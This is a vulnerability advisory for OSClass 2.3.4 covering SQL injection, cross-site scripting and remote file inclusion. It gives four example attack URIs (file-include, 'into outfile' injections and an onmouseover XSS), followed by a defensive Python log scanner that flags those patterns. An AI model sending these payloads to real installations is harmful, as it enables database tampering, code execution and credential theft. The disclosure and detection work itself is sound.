OSClass Multiple Remote Vulnerabilities
BID:51721
Info
| Bugtraq ID: | 51721 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2012 12:00AM |
| Updated: | Jan 30 2012 12:00AM |
| Credit: | Reported by the vendor |
| Vulnerable: | OSclass osclass 2.3.4, OSclass osclass 2.3.3 |
| Not Vulnerable: | OSclass osclass 2.3.5 |
Discussion
OSClass is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and a remote file-include vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary server-side script code on an affected computer in the context of the webserver process; other attacks are also possible.
OSClass 2.3.4 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues through a browser. To exploit the cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E
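For reviewing web-server logs of an affected install, the following Python is an added example (not part of the original advisory or of OSClass) that flags admin AJAX requests shaped like the URIs above. The function names and finding labels are hypothetical, and it assumes the `id` parameter is meant to be an integer category id.

```python
import re
from urllib.parse import urlsplit, parse_qs

ADMIN_AJAX = re.compile(r"/oc-admin/index\.php$")
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify(uri):
    """Return the set of findings for one request URI (empty set = nothing flagged)."""
    parts = urlsplit(uri)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if not ADMIN_AJAX.search(parts.path) or params.get("page") != ["ajax"]:
        return set()
    findings = set()
    # action=upgrade: a file value carrying a URL scheme points at a remote resource.
    if params.get("action") == ["upgrade"]:
        if any(URL_SCHEME.match(v) for v in params.get("file", [])):
            findings.add("remote-file")
    # Assumption: id is an integer category id, so any other content is suspect.
    for value in params.get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue
        findings.add("non-integer-id")
        if re.search(r"['\")]|--", value):   # quote, paren or SQL comment marker
            findings.add("sql-metachar")
        if re.search(r"[<>]", value):        # HTML markup in the value
            findings.add("markup")
    return findings

# The four example URIs from the advisory, plus one constructed benign request.
BASE = "http://www.example.com/osclass/oc-admin/index.php?page=ajax"
SAMPLES = [
    BASE + "&action=upgrade&file=http://127.0.0.1/tmp.php",
    BASE + "&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p"
           "&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201",
    BASE + "&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201",
    BASE + "&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E",
    BASE + "&action=enable_category&id=2",  # constructed benign request
]

def scan(uris):
    """Map each flagged URI to its sorted findings; clean requests are omitted."""
    return {u: sorted(f) for u in uris if (f := classify(u))}

if __name__ == "__main__":
    for uri, found in scan(SAMPLES).items():
        print(", ".join(found), "<-", uri)
```

`classify` also accepts a bare request path with query string, as it appears in an access-log request line.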
Solution / Fix
Solution:
Updates are available. Please see the references for more information.
References
References:
- OSClass 2.3.5 (OSclass)
- osclass Homepage (OSclass)